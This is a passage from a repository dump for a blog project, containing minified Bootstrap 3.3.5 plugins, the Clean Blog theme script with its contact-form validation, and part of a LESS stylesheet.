',trigger:"hover focus",title:"",delay:0,html:!1,container:!1,viewport:{selector:"body",padding:0}},c.prototype.init=function(b,c,d){if(this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d),this.$viewport=this.options.viewport&&a(a.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focusin",i="hover"==g?"mouseleave":"focusout";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},c.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},c.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusin"==b.type?"focus":"hover"]=!0),c.tip().hasClass("in")||"in"==c.hoverState?void(c.hoverState="in"):(clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show())},c.prototype.isInStateTrue=function(){for(var a in this.inState)if(this.inState[a])return!0;return!1},c.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusout"==b.type?"focus":"hover"]=!1),c.isInStateTrue()?void 0:(clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?void(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide)):c.hide())},c.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(b);var d=a.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(b.isDefaultPrevented()||!d)return;var e=this,f=this.tip(),g=this.getUID(this.type);this.setContent(),f.attr("id",g),this.$element.attr("aria-describedby",g),this.options.animation&&f.addClass("fade");var h="function"==typeof this.options.placement?this.options.placement.call(this,f[0],this.$element[0]):this.options.placement,i=/\s?auto?\s?/i,j=i.test(h);j&&(h=h.replace(i,"")||"top"),f.detach().css({top:0,left:0,display:"block"}).addClass(h).data("bs."+this.type,this),this.options.container?f.appendTo(this.options.container):f.insertAfter(this.$element),this.$element.trigger("inserted.bs."+this.type);var k=this.getPosition(),l=f[0].offsetWidth,m=f[0].offsetHeight;if(j){var n=h,o=this.getPosition(this.$viewport);h="bottom"==h&&k.bottom+m>o.bottom?"top":"top"==h&&k.top-mo.width?"left":"left"==h&&k.left-lg.top+g.height&&(e.top=g.top+g.height-i)}else{var j=b.left-f,k=b.left+f+c;jg.right&&(e.left=g.left+g.width-k)}return e},c.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},c.prototype.getUID=function(a){do a+=~~(1e6*Math.random());while(document.getElementById(a));return a},c.prototype.tip=function(){if(!this.$tip&&(this.$tip=a(this.options.template),1!=this.$tip.length))throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!");return this.$tip},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},c.prototype.enable=function(){this.enabled=!0},c.prototype.disable=function(){this.enabled=!1},c.prototype.toggleEnabled=function(){this.enabled=!this.enabled},c.prototype.toggle=function(b){var c=this;b&&(c=a(b.currentTarget).data("bs."+this.type),c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c))),b?(c.inState.click=!c.inState.click,c.isInStateTrue()?c.enter(c):c.leave(c)):c.tip().hasClass("in")?c.leave(c):c.enter(c)},c.prototype.destroy=function(){var a=this;clearTimeout(this.timeout),this.hide(function(){a.$element.off("."+a.type).removeData("bs."+a.type),a.$tip&&a.$tip.detach(),a.$tip=null,a.$arrow=null,a.$viewport=null})};var d=a.fn.tooltip;a.fn.tooltip=b,a.fn.tooltip.Constructor=c,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=d,this}}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof b&&b;(e||!/destroy|hide/.test(b))&&(e||d.data("bs.popover",e=new c(this,f)),"string"==typeof b&&e[b]())})}var c=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");c.VERSION="3.3.5",c.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:''}),c.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),c.prototype.constructor=c,c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content").children().detach().end()[this.options.html?"string"==typeof c?"html":"append":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},c.prototype.hasContent=function(){return this.getTitle()||this.getContent()},c.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")};var d=a.fn.popover;a.fn.popover=b,a.fn.popover.Constructor=c,a.fn.popover.noConflict=function(){return a.fn.popover=d,this}}(jQuery),+function(a){"use strict";function b(c,d){this.$body=a(document.body),this.$scrollElement=a(a(c).is(document.body)?window:c),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||"")+" .nav li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",a.proxy(this.process,this)),this.refresh(),this.process()}function c(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})}b.VERSION="3.3.5",b.DEFAULTS={offset:10},b.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},b.prototype.refresh=function(){var b=this,c="offset",d=0;this.offsets=[],this.targets=[],this.scrollHeight=this.getScrollHeight(),a.isWindow(this.$scrollElement[0])||(c="position",d=this.$scrollElement.scrollTop()),this.$body.find(this.selector).map(function(){var b=a(this),e=b.data("target")||b.attr("href"),f=/^#./.test(e)&&a(e);return f&&f.length&&f.is(":visible")&&[[f[c]().top+d,e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){b.offsets.push(this[0]),b.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.getScrollHeight(),d=this.options.offset+c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(this.scrollHeight!=c&&this.refresh(),b>=d)return g!=(a=f[f.length-1])&&this.activate(a);if(g&&b=e[a]&&(void 0===e[a+1]||b .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!0),e&&e()}var g=d.find("> .active"),h=e&&a.support.transition&&(g.length&&g.hasClass("fade")||!!d.find("> .fade").length);g.length&&h?g.one("bsTransitionEnd",f).emulateTransitionEnd(c.TRANSITION_DURATION):f(),g.removeClass("in")};var d=a.fn.tab;a.fn.tab=b,a.fn.tab.Constructor=c,a.fn.tab.noConflict=function(){return a.fn.tab=d,this};var e=function(c){c.preventDefault(),b.call(a(this),"show")};a(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',e).on("click.bs.tab.data-api",'[data-toggle="pill"]',e)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof b&&b;e||d.data("bs.affix",e=new c(this,f)),"string"==typeof b&&e[b]()})}var c=function(b,d){this.options=a.extend({},c.DEFAULTS,d),this.$target=a(this.options.target).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(b),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};c.VERSION="3.3.5",c.RESET="affix affix-top affix-bottom",c.DEFAULTS={offset:0,target:window},c.prototype.getState=function(a,b,c,d){var e=this.$target.scrollTop(),f=this.$element.offset(),g=this.$target.height();if(null!=c&&"top"==this.affixed)return c>e?"top":!1;if("bottom"==this.affixed)return null!=c?e+this.unpin<=f.top?!1:"bottom":a-d>=e+g?!1:"bottom";var h=null==this.affixed,i=h?e:f.top,j=h?g:b;return null!=c&&c>=e?"top":null!=d&&i+j>=a-d?"bottom":!1},c.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(c.RESET).addClass("affix");var a=this.$target.scrollTop(),b=this.$element.offset();return this.pinnedOffset=b.top-a},c.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},c.prototype.checkPosition=function(){if(this.$element.is(":visible")){var b=this.$element.height(),d=this.options.offset,e=d.top,f=d.bottom,g=Math.max(a(document).height(),a(document.body).height());"object"!=typeof d&&(f=e=d),"function"==typeof e&&(e=d.top(this.$element)),"function"==typeof f&&(f=d.bottom(this.$element));var h=this.getState(g,b,e,f);if(this.affixed!=h){null!=this.unpin&&this.$element.css("top","");var i="affix"+(h?"-"+h:""),j=a.Event(i+".bs.affix");if(this.$element.trigger(j),j.isDefaultPrevented())return;this.affixed=h,this.unpin="bottom"==h?this.getPinnedOffset():null,this.$element.removeClass(c.RESET).addClass(i).trigger(i.replace("affix","affixed")+".bs.affix")}"bottom"==h&&this.$element.offset({top:g-b-f})}};var d=a.fn.affix;a.fn.affix=b,a.fn.affix.Constructor=c,a.fn.affix.noConflict=function(){return a.fn.affix=d,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var c=a(this),d=c.data();d.offset=d.offset||{},null!=d.offsetBottom&&(d.offset.bottom=d.offsetBottom),null!=d.offsetTop&&(d.offset.top=d.offsetTop),b.call(c,d)})})}(jQuery); -------------------------------------------------------------------------------- /knasty/static/js/clean-blog.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * Clean Blog v1.0.0 (http://startbootstrap.com) 3 | * Copyright 2014 Start Bootstrap 4 | * Licensed under Apache 2.0 (https://github.com/IronSummitMedia/startbootstrap/blob/gh-pages/LICENSE) 5 | */ 6 | 7 | $(function(){$("input,textarea").jqBootstrapValidation({preventSubmit:!0,submitError:function(){},submitSuccess:function(a,b){b.preventDefault();var c=$("input#name").val(),d=$("input#email").val(),e=$("input#phone").val(),f=$("textarea#message").val(),g=c;g.indexOf(" ")>=0&&(g=c.split(" ").slice(0,-1).join(" ")),$.ajax({url:"././mail/contact_me.php",type:"POST",data:{name:c,phone:e,email:d,message:f},cache:!1,success:function(){$("#success").html("
"),$("#success > .alert-success").html(""),$("#success > .alert-success").append("Your message has been sent. "),$("#success > .alert-success").append("
"),$("#contactForm").trigger("reset")},error:function(){$("#success").html("
"),$("#success > .alert-danger").html(""),$("#success > .alert-danger").append("Sorry "+g+", it seems that my mail server is not responding. Please try again later!"),$("#success > .alert-danger").append("
"),$("#contactForm").trigger("reset")}})},filter:function(){return $(this).is(":visible")}}),$('a[data-toggle="tab"]').click(function(a){a.preventDefault(),$(this).tab("show")})}),$("#name").focus(function(){$("#success").html("")}),function(a){function b(a){return new RegExp("^"+a+"$")}function c(a,b){for(var c=Array.prototype.slice.call(arguments).splice(2),d=a.split("."),e=d.pop(),f=0;f'),e.find(".controls").append(h),d.push(h[0])),c.options.sniffHtml){var k="";if(void 0!==b.attr("pattern")&&(k="Not in the expected format",b.data("validationPatternMessage")&&(k=b.data("validationPatternMessage")),b.data("validationPatternMessage",k),b.data("validationPatternRegex",b.attr("pattern"))),void 0!==b.attr("max")||void 0!==b.attr("aria-valuemax")){var l=b.attr(void 0!==b.attr("max")?"max":"aria-valuemax");k="Too high: Maximum of '"+l+"'",b.data("validationMaxMessage")&&(k=b.data("validationMaxMessage")),b.data("validationMaxMessage",k),b.data("validationMaxMax",l)}if(void 0!==b.attr("min")||void 0!==b.attr("aria-valuemin")){var m=b.attr(void 0!==b.attr("min")?"min":"aria-valuemin");k="Too low: Minimum of '"+m+"'",b.data("validationMinMessage")&&(k=b.data("validationMinMessage")),b.data("validationMinMessage",k),b.data("validationMinMin",m)}void 0!==b.attr("maxlength")&&(k="Too long: Maximum of '"+b.attr("maxlength")+"' characters",b.data("validationMaxlengthMessage")&&(k=b.data("validationMaxlengthMessage")),b.data("validationMaxlengthMessage",k),b.data("validationMaxlengthMaxlength",b.attr("maxlength"))),void 0!==b.attr("minlength")&&(k="Too short: Minimum of '"+b.attr("minlength")+"' characters",b.data("validationMinlengthMessage")&&(k=b.data("validationMinlengthMessage")),b.data("validationMinlengthMessage",k),b.data("validationMinlengthMinlength",b.attr("minlength"))),(void 0!==b.attr("required")||void 0!==b.attr("aria-required"))&&(k=c.builtInValidators.required.message,b.data("validationRequiredMessage")&&(k=b.data("validationRequiredMessage")),b.data("validationRequiredMessage",k)),void 0!==b.attr("type")&&"number"===b.attr("type").toLowerCase()&&(k=c.builtInValidators.number.message,b.data("validationNumberMessage")&&(k=b.data("validationNumberMessage")),b.data("validationNumberMessage",k)),void 0!==b.attr("type")&&"email"===b.attr("type").toLowerCase()&&(k="Not a valid email address",b.data("validationValidemailMessage")?k=b.data("validationValidemailMessage"):b.data("validationEmailMessage")&&(k=b.data("validationEmailMessage")),b.data("validationValidemailMessage",k)),void 0!==b.attr("minchecked")&&(k="Not enough options checked; Minimum of '"+b.attr("minchecked")+"' required",b.data("validationMincheckedMessage")&&(k=b.data("validationMincheckedMessage")),b.data("validationMincheckedMessage",k),b.data("validationMincheckedMinchecked",b.attr("minchecked"))),void 0!==b.attr("maxchecked")&&(k="Too many options checked; Maximum of '"+b.attr("maxchecked")+"' required",b.data("validationMaxcheckedMessage")&&(k=b.data("validationMaxcheckedMessage")),b.data("validationMaxcheckedMessage",k),b.data("validationMaxcheckedMaxchecked",b.attr("maxchecked")))}void 0!==b.data("validation")&&(j=b.data("validation").split(",")),a.each(b.data(),function(a){var b=a.replace(/([A-Z])/g,",$1").split(",");"validation"===b[0]&&b[1]&&j.push(b[1])});var n=j,o=[];do a.each(j,function(a,b){j[a]=f(b)}),j=a.unique(j),o=[],a.each(n,function(d,e){if(void 0!==b.data("validation"+e+"Shortcut"))a.each(b.data("validation"+e+"Shortcut").split(","),function(a,b){o.push(b)});else if(c.builtInValidators[e.toLowerCase()]){var g=c.builtInValidators[e.toLowerCase()];"shortcut"===g.type.toLowerCase()&&a.each(g.shortcut.split(","),function(a,b){b=f(b),o.push(b),j.push(b)})}}),n=o;while(n.length>0);var p={};a.each(j,function(d,e){var g=b.data("validation"+e+"Message"),h=void 0!==g,i=!1;if(g=g?g:"'"+e+"' validation failed ",a.each(c.validatorTypes,function(c,d){void 0===p[c]&&(p[c]=[]),i||void 0===b.data("validation"+e+f(d.name))||(p[c].push(a.extend(!0,{name:f(d.name),message:g},d.init(b,e))),i=!0)}),!i&&c.builtInValidators[e.toLowerCase()]){var j=a.extend(!0,{},c.builtInValidators[e.toLowerCase()]);h&&(j.message=g);var k=j.type.toLowerCase();"shortcut"===k?i=!0:a.each(c.validatorTypes,function(c,d){void 0===p[c]&&(p[c]=[]),i||k!==c.toLowerCase()||(b.data("validation"+e+f(d.name),j[d.name.toLowerCase()]),p[k].push(a.extend(j,d.init(b,e))),i=!0)})}i||a.error("Cannot find validation info for '"+e+"'")}),h.data("original-contents",h.data("original-contents")?h.data("original-contents"):h.html()),h.data("original-role",h.data("original-role")?h.data("original-role"):h.attr("role")),e.data("original-classes",e.data("original-clases")?e.data("original-classes"):e.attr("class")),b.data("original-aria-invalid",b.data("original-aria-invalid")?b.data("original-aria-invalid"):b.attr("aria-invalid")),b.bind("validation.validation",function(d,e){var f=g(b),h=[];return a.each(p,function(d,g){(f||f.length||e&&e.includeEmpty||c.validatorTypes[d].blockSubmit&&e&&e.submitting)&&a.each(g,function(a,e){c.validatorTypes[d].validate(b,f,e)&&h.push(e.message)})}),h}),b.bind("getValidators.validation",function(){return p}),b.bind("submit.validation",function(){return b.triggerHandler("change.validation",{submitting:!0})}),b.bind(["keyup","focus","blur","click","keydown","keypress","change"].join(".validation ")+".validation",function(d,f){var j=g(b),k=[];e.find("input,textarea,select").each(function(c,d){var e=k.length;if(a.each(a(d).triggerHandler("validation.validation",f),function(a,b){k.push(b)}),k.length>e)a(d).attr("aria-invalid","true");else{var g=b.data("original-aria-invalid");a(d).attr("aria-invalid",void 0!==g?g:!1)}}),i.find("input,select,textarea").not(b).not('[name="'+b.attr("name")+'"]').trigger("validationLostFocus.validation"),k=a.unique(k.sort()),k.length?(e.removeClass("success error").addClass("warning"),h.html(c.options.semanticallyStrict&&1===k.length?k[0]+(c.options.prependExistingHelpBlock?h.data("original-contents"):""):'
  • '+k.join("
  • ")+"
"+(c.options.prependExistingHelpBlock?h.data("original-contents"):""))):(e.removeClass("warning error success"),j.length>0&&e.addClass("success"),h.html(h.data("original-contents"))),"blur"===d.type&&e.removeClass("success")}),b.bind("validationLostFocus.validation",function(){e.removeClass("success")})})},destroy:function(){return this.each(function(){var b=a(this),c=b.parents(".form-group").first(),e=c.find(".help-block").first();b.unbind(".validation"),e.html(e.data("original-contents")),c.attr("class",c.data("original-classes")),b.attr("aria-invalid",b.data("original-aria-invalid")),e.attr("role",b.data("original-role")),d.indexOf(e[0])>-1&&e.remove()})},collectErrors:function(){var b={};return this.each(function(c,d){var e=a(d),f=e.attr("name"),g=e.triggerHandler("validation.validation",{includeEmpty:!0});b[f]=a.extend(!0,g,b[f])}),a.each(b,function(a,c){0===c.length&&delete b[a]}),b},hasErrors:function(){var b=[];return this.each(function(c,d){b=b.concat(a(d).triggerHandler("getValidators.validation")?a(d).triggerHandler("validation.validation",{submitting:!0}):[])}),b.length>0},override:function(b){e=a.extend(!0,e,b)}},validatorTypes:{callback:{name:"callback",init:function(a,b){return{validatorName:b,callback:a.data("validation"+b+"Callback"),lastValue:a.val(),lastValid:!0,lastFinished:!0}},validate:function(a,b,d){if(d.lastValue===b&&d.lastFinished)return!d.lastValid;if(d.lastFinished===!0){d.lastValue=b,d.lastValid=!0,d.lastFinished=!1;var e=d,f=a;c(d.callback,window,a,b,function(a){e.lastValue===a.value&&(e.lastValid=a.valid,a.message&&(e.message=a.message),e.lastFinished=!0,f.data("validation"+e.validatorName+"Message",e.message),setTimeout(function(){f.trigger("change.validation")},1))})}return!1}},ajax:{name:"ajax",init:function(a,b){return{validatorName:b,url:a.data("validation"+b+"Ajax"),lastValue:a.val(),lastValid:!0,lastFinished:!0}},validate:function(b,c,d){return""+d.lastValue==""+c&&d.lastFinished===!0?d.lastValid===!1:(d.lastFinished===!0&&(d.lastValue=c,d.lastValid=!0,d.lastFinished=!1,a.ajax({url:d.url,data:"value="+c+"&field="+b.attr("name"),dataType:"json",success:function(a){""+d.lastValue==""+a.value&&(d.lastValid=!!a.valid,a.message&&(d.message=a.message),d.lastFinished=!0,b.data("validation"+d.validatorName+"Message",d.message),setTimeout(function(){b.trigger("change.validation")},1))},failure:function(){d.lastValid=!0,d.message="ajax call failed",d.lastFinished=!0,b.data("validation"+d.validatorName+"Message",d.message),setTimeout(function(){b.trigger("change.validation")},1)}})),!1)}},regex:{name:"regex",init:function(a,c){return{regex:b(a.data("validation"+c+"Regex"))}},validate:function(a,b,c){return!c.regex.test(b)&&!c.negative||c.regex.test(b)&&c.negative}},required:{name:"required",init:function(){return{}},validate:function(a,b,c){return!(0!==b.length||c.negative)||!!(b.length>0&&c.negative)},blockSubmit:!0},match:{name:"match",init:function(a,b){var c=a.parents("form").first().find('[name="'+a.data("validation"+b+"Match")+'"]').first();return c.bind("validation.validation",function(){a.trigger("change.validation",{submitting:!0})}),{element:c}},validate:function(a,b,c){return b!==c.element.val()&&!c.negative||b===c.element.val()&&c.negative},blockSubmit:!0},max:{name:"max",init:function(a,b){return{max:a.data("validation"+b+"Max")}},validate:function(a,b,c){return parseFloat(b,10)>parseFloat(c.max,10)&&!c.negative||parseFloat(b,10)<=parseFloat(c.max,10)&&c.negative}},min:{name:"min",init:function(a,b){return{min:a.data("validation"+b+"Min")}},validate:function(a,b,c){return parseFloat(b)=parseFloat(c.min)&&c.negative}},maxlength:{name:"maxlength",init:function(a,b){return{maxlength:a.data("validation"+b+"Maxlength")}},validate:function(a,b,c){return b.length>c.maxlength&&!c.negative||b.length<=c.maxlength&&c.negative}},minlength:{name:"minlength",init:function(a,b){return{minlength:a.data("validation"+b+"Minlength")}},validate:function(a,b,c){return b.length=c.minlength&&c.negative}},maxchecked:{name:"maxchecked",init:function(a,b){var c=a.parents("form").first().find('[name="'+a.attr("name")+'"]');return c.bind("click.validation",function(){a.trigger("change.validation",{includeEmpty:!0})}),{maxchecked:a.data("validation"+b+"Maxchecked"),elements:c}},validate:function(a,b,c){return c.elements.filter(":checked").length>c.maxchecked&&!c.negative||c.elements.filter(":checked").length<=c.maxchecked&&c.negative},blockSubmit:!0},minchecked:{name:"minchecked",init:function(a,b){var c=a.parents("form").first().find('[name="'+a.attr("name")+'"]');return c.bind("click.validation",function(){a.trigger("change.validation",{includeEmpty:!0})}),{minchecked:a.data("validation"+b+"Minchecked"),elements:c}},validate:function(a,b,c){return c.elements.filter(":checked").length=c.minchecked&&c.negative},blockSubmit:!0}},builtInValidators:{email:{name:"Email",type:"shortcut",shortcut:"validemail"},validemail:{name:"Validemail",type:"regex",regex:"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,4}",message:"Not a valid email address"},passwordagain:{name:"Passwordagain",type:"match",match:"password",message:"Does not match the given password"},positive:{name:"Positive",type:"shortcut",shortcut:"number,positivenumber"},negative:{name:"Negative",type:"shortcut",shortcut:"number,negativenumber"},number:{name:"Number",type:"regex",regex:"([+-]?\\d+(\\.\\d*)?([eE][+-]?[0-9]+)?)?",message:"Must be a number"},integer:{name:"Integer",type:"regex",regex:"[+-]?\\d+",message:"No decimal places allowed"},positivenumber:{name:"Positivenumber",type:"min",min:0,message:"Must be a positive number"},negativenumber:{name:"Negativenumber",type:"max",max:0,message:"Must be a negative number"},required:{name:"Required",type:"required",message:"This is required"},checkone:{name:"Checkone",type:"minchecked",minchecked:1,message:"Check at least one option"}}},f=function(a){return a.toLowerCase().replace(/(^|\s)([a-z])/g,function(a,b,c){return b+c.toUpperCase()})},g=function(b){var c=b.val(),d=b.attr("type");return"checkbox"===d&&(c=b.is(":checked")?c:""),"radio"===d&&(c=a('input[name="'+b.attr("name")+'"]:checked').length>0?c:""),c};a.fn.jqBootstrapValidation=function(b){return e.methods[b]?e.methods[b].apply(this,Array.prototype.slice.call(arguments,1)):"object"!=typeof b&&b?(a.error("Method "+b+" does not exist on jQuery.jqBootstrapValidation"),null):e.methods.init.apply(this,arguments)},a.jqBootstrapValidation=function(){a(":input").not("[type=image],[type=submit]").jqBootstrapValidation.apply(this,arguments)}}(jQuery),$(function(){$("body").on("input propertychange",".floating-label-form-group",function(a){$(this).toggleClass("floating-label-form-group-with-value",!!$(a.target).val())}).on("focus",".floating-label-form-group",function(){$(this).addClass("floating-label-form-group-with-focus")}).on("blur",".floating-label-form-group",function(){$(this).removeClass("floating-label-form-group-with-focus")})}),jQuery(document).ready(function(a){var b=1170;if(a(window).width()>b){var c=a(".navbar-custom").height();a(window).on("scroll",{previousTop:0},function(){var b=a(window).scrollTop();b0&&a(".navbar-custom").hasClass("is-fixed")?a(".navbar-custom").addClass("is-visible"):a(".navbar-custom").removeClass("is-visible is-fixed"):(a(".navbar-custom").removeClass("is-visible"),b>c&&!a(".navbar-custom").hasClass("is-fixed")&&a(".navbar-custom").addClass("is-fixed")),this.previousTop=b})}}); -------------------------------------------------------------------------------- /knasty/static/less/clean-blog.less: -------------------------------------------------------------------------------- 1 | @import "variables.less"; 2 | @import "mixins.less"; 3 | 4 | // Global Components 5 | 6 | body { 7 | .serif; 8 | font-size: 20px; 9 | color: @gray-dark; 10 | } 11 | 12 | // -- Typography 13 | 14 | p { 15 | line-height: 1.5; 16 | margin: 30px 0; 17 | a { 18 | text-decoration: underline; 19 | } 20 | } 21 | 22 | h1, 23 | h2, 24 | h3, 25 | h4, 26 | h5, 27 | h6 { 28 | .sans-serif; 29 | font-weight: 800; 30 | } 31 | 32 | a { 33 | color: @gray-dark; 34 | &:hover, 35 | &:focus { 36 | color: @brand-primary; 37 | } 38 | } 39 | 40 | a img { 41 | &:hover, 42 | &:focus { 43 | cursor: zoom-in; 44 | } 45 | } 46 | 47 | blockquote { 48 | color: @gray; 49 | font-style: italic; 50 | } 51 | 52 | hr.small { 53 | max-width: 100px; 54 | margin: 15px auto; 55 | border-width: 4px; 56 | border-color: white; 57 | } 58 | 59 | // Navigation 60 | 61 | .navbar-custom { 62 | position: absolute; 63 | top: 0; 64 | left: 0; 65 | width: 100%; 66 | z-index: 3; 67 | .sans-serif; 68 | .navbar-brand { 69 | font-weight: 800; 70 | } 71 | .nav { 72 | li { 73 | a { 74 | text-transform: uppercase; 75 | font-size: 12px; 76 | font-weight: 800; 77 | letter-spacing: 1px; 78 | } 79 | } 80 | } 81 | @media only screen and (min-width: 768px) { 82 | background: transparent; 83 | border-bottom: 1px solid transparent; 84 | .navbar-brand { 85 | color: white; 86 | padding: 20px; 87 | &:hover, 88 | &:focus { 89 | color: @white-faded; 90 | } 91 | } 92 | .nav { 93 | li { 94 | a { 95 | color: white; 96 | padding: 20px; 97 | &:hover, 98 | &:focus { 99 | color: @white-faded; 100 | } 101 | } 102 | } 103 | } 104 | } 105 | @media only screen and (min-width: 1170px) { 106 | -webkit-transition: background-color 0.3s; 107 | -moz-transition: background-color 0.3s; 108 | transition: background-color 0.3s; 109 | /* Force Hardware Acceleration in WebKit */ 110 | -webkit-transform: translate3d(0, 0, 0); 111 | -moz-transform: translate3d(0, 0, 0); 112 | -ms-transform: translate3d(0, 0, 0); 113 | -o-transform: translate3d(0, 0, 0); 114 | transform: translate3d(0, 0, 0); 115 | -webkit-backface-visibility: hidden; 116 | backface-visibility: hidden; 117 | &.is-fixed { 118 | /* when the user scrolls down, we hide the header right above the viewport */ 119 | position: fixed; 120 | top: -61px; 121 | background-color: fade(white, 90%); 122 | border-bottom: 1px solid darken(white, 5%); 123 | -webkit-transition: -webkit-transform 0.3s; 124 | -moz-transition: -moz-transform 0.3s; 125 | transition: transform 0.3s; 126 | .navbar-brand { 127 | color: @gray-dark; 128 | &:hover, 129 | &:focus { 130 | color: @brand-primary; 131 | } 132 | } 133 | .nav { 134 | li { 135 | a { 136 | color: @gray-dark; 137 | &:hover, 138 | &:focus { 139 | color: @brand-primary; 140 | } 141 | } 142 | } 143 | } 144 | } 145 | &.is-visible { 146 | /* if the user changes the scrolling direction, we show the header */ 147 | -webkit-transform: translate3d(0, 100%, 0); 148 | -moz-transform: translate3d(0, 100%, 0); 149 | -ms-transform: translate3d(0, 100%, 0); 150 | -o-transform: translate3d(0, 100%, 0); 151 | transform: translate3d(0, 100%, 0); 152 | } 153 | } 154 | } 155 | 156 | // Header 157 | 158 | .intro-header { 159 | background-color: @gray; 160 | background: no-repeat center center; 161 | background-attachment: scroll; 162 | .background-cover; 163 | // NOTE: Background images are set within the HTML using inline CSS! 164 | margin-bottom: 50px; 165 | .site-heading, 166 | .post-heading, 167 | .page-heading { 168 | padding: 100px 0 50px; 169 | color: white; 170 | @media only screen and (min-width: 768px) { 171 | padding: 150px 0; 172 | } 173 | } 174 | .site-heading, 175 | .page-heading { 176 | text-align: center; 177 | h1 { 178 | margin-top: 0; 179 | font-size: 50px; 180 | } 181 | .subheading { 182 | font-size: 24px; 183 | line-height: 1.1; 184 | display: block; 185 | .sans-serif; 186 | font-weight: 300; 187 | margin: 10px 0 0; 188 | } 189 | @media only screen and (min-width: 768px) { 190 | h1 { 191 | font-size: 80px; 192 | } 193 | } 194 | } 195 | .post-heading { 196 | h1 { 197 | font-size: 35px; 198 | } 199 | .subheading, 200 | .meta { 201 | line-height: 1.1; 202 | display: block; 203 | } 204 | .subheading { 205 | .sans-serif; 206 | font-size: 24px; 207 | margin: 10px 0 30px; 208 | font-weight: 600; 209 | } 210 | .meta { 211 | .serif; 212 | font-style: italic; 213 | font-weight: 300; 214 | font-size: 20px; 215 | a { 216 | color: white; 217 | } 218 | } 219 | @media only screen and (min-width: 768px) { 220 | h1 { 221 | font-size: 55px; 222 | } 223 | .subheading { 224 | font-size: 30px; 225 | } 226 